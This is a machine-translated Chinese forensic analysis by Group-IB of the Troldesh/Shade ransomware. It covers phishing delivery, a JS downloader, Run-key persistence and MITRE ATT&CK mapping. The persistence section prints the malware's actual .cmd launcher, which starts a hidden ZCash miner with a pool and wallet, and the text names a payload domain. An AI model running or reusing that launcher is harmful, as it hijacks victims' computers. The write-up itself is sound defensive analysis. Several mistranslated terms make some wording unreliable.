如果您关注
新闻 ,那么您可能会知道针对俄罗斯公司Troldesh勒索软件病毒(Shade)的新大规模攻击,该病毒是网络犯罪分子中最受欢迎的加密锁之一。 仅在六月,Group-IB就代表主要航空公司,汽车经销商和媒体的员工,从Troldesh发现了1100多封网络钓鱼电子邮件。
在本文中,我们将研究在受到威胁的设备的介质上进行Shade / Trotldesh攻击后可以发现的法医伪像,并比较使用MITER ATT&CK的攻击者所使用的战术和技术。
由Group-IB首席法医专家
Oleg Skulkin发表
Troldesh,也称为Shade,XTBL,Trojan.Encoder.858,Da Vinci,No_more_ransome,是一种对用户受感染设备上的文件进行加密的病毒,需要赎金才能恢复对信息的访问。 Troldesh的最新活动表明,现在它不仅加密文件,而且还加密加密货币矿工,并向网站产生流量,以增加在线广告的流量和收入。
早在2015年,Group-IB专家就首次发现Troldesh的活动,他们注意到该病毒成功绕过了防病毒保护工具。 攻击者会定期更改“打包程序”(一种减小文件大小并使其难以检测和反转的打包程序),因此,防病毒程序通常会跳过它。 到2018年底,Troldesh成为最受欢迎的病毒之一,并与RTM和Pony一起自信地进入前三名。 PaloAlto Networks的专家报告说,Troldesh不仅为俄罗斯目的而工作-受勒索软件影响的国家包括美国,日本,印度,泰国和加拿大。
初始感染载体
通常,“ Troldesh / Shade”是通过带有恶意附件的网络钓鱼电子邮件分发的,例如,包含恶意JS文件的受密码保护的存档,在打开后下载并启动密码锁。 这是什么意思? 通过分析此类档案打开的痕迹来开始我们的研究是一个好主意。 在哪里可以找到这种痕迹? 好吧,例如,在跳转列表中:
使用JLECmd从5f7b5f1e01b83767.automaticDestinations-ms文件提取的数据
因此,我们看到用户打开了名为“关于订购的密码11.rar”的档案。 但是他是如何进入系统的呢? 该文件位于“下载”目录中,很可能是从Internet下载的。 让我们看一下浏览器的历史记录:
使用Belkasoft证据中心从WebCache01.dat文件提取的数据
如您所见,该文件是使用Microsoft Edge Web浏览器下载的,并保存在Downloads目录中。 此外,就在下载之前,用户访问了Web站点,因此,通过电子邮件接收了存档。
因此,我们正在处理最常见的技术:T1193-“鱼叉式附着”。
启动和旁路保护机制
如果我们查看存档文件,则会发现一个名称几乎相同的JS文件。 为了加载并开始运行恶意软件,用户必须双击指定的文件。 之后,“ wscript.exe”将启动JS文件,该文件将从
mat.tradetoolsfx [。] Com下载恶意文件并运行。 我们可以在磁盘上找到任何痕迹吗? 当然可以!
让我们看一下wscript.exe预取文件,重点关注与之交互的文件:
<...>
\音量{01d3dcb4976cd072-3a97874f} \用户\ 0136 \ APPDATA \本地\ MICROSOFT \ WINDOWS \ INETCACHE \ IE \ OEJ87644 \ 1C [1] .JPG
\音量{01d3dcb4976cd072-3a97874f} \用户\ 0136 \ APPDATA \本地\温度\ 7ZO84024637 \订购详细信息A.JS
<...>
因此,我们有两个有趣的文件。 首先,现在我们知道存档中的JS文件的名称,其次,我们找到了下载的文件的名称。 现在是时候找出它的下载位置了。 让我们再次看一下WebCache01.dat:
使用ESEDatabaseView从WebCache01.dat检索的数据
如果我们解码ResponseHeaders字段的内容,则会得到以下信息:
HTTP / 1.1 200 OK
内容类型:图片/ jpeg
内容长度:1300656
ETag:“ 5ced19b6-13d8b0”
严格的运输安全性:最大年龄= 31536000;
实际上,这不是JPG文件,而是解密并启动Shade实例的可执行文件。
那么我们在这里处理什么技术呢? 脚本(T1064),用户执行(T1204)和伪装(T1036)。
系统引脚
“ Shade”使用一种相当简单的系统修复方法-注册表项“ Software \ Microsoft \ Windows \ CurrentVersion \ Run”(T1060)。 我们已经知道恶意的JS文件是由用户“ 0136”打开的,因此请查看对应的文件“ NTUSER.DAT”:
Belkasoft证据中心检测到的系统锁定机制
但这还不是全部! 更有趣的是:
Belkasoft证据中心检测到的系统锁定机制
如图所示,还有一个有趣的条目指向C:\ ProgramData \ SysWOW64 \ leWRX7w.cmd。 让我们看看这个文件里面是什么:
echo CreateObject(“ Wscript.Shell”)。运行“” ^&WScript.Arguments(0)^&“,0,False>”%TEMP%/ pxNXSB.vbs“ &&开始/等待wscript.exe”%TEMP% /pxNXSB.vbs“” C:\用户\ 0136 \ AppData \漫游\ SOFTWA〜1 \ NHEQMI〜1.EXE -l eu1-zcash.flypool.org ∗ 333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.7B9D281&% TEMP%\ pxNXSB.vbs“
因此,我们还有一个文件。 根据其内容判断,攻击者使用它来开采ZCash加密货币。 因此,即使受害者支付了赎金,入侵者仍将使用其系统的资源。
后果
首先,“ Shade”是一个加密时钟,所以首先引起您注意的是很多扩展名为“ CRYPTED000007”,“ Read Me”的文件以及桌面上的“新鲜”墙纸:
可以在C:\ Users \%username%\ AppData \ Roaming目录中找到带有此图像的文件。 我们正在处理什么设备? “为影响而加密的数据”(T1486)。
但是,正如您已经了解的那样,“ Shade”不是普通的密码柜。 除了cryptoclocker本身之外,我们还发现了一个矿工,这意味着值得一提的另一种技术是“资源劫持”。
斜切ATT&CK
我们的分析揭示了Shade分销商的许多策略和技术,让我们总结一下: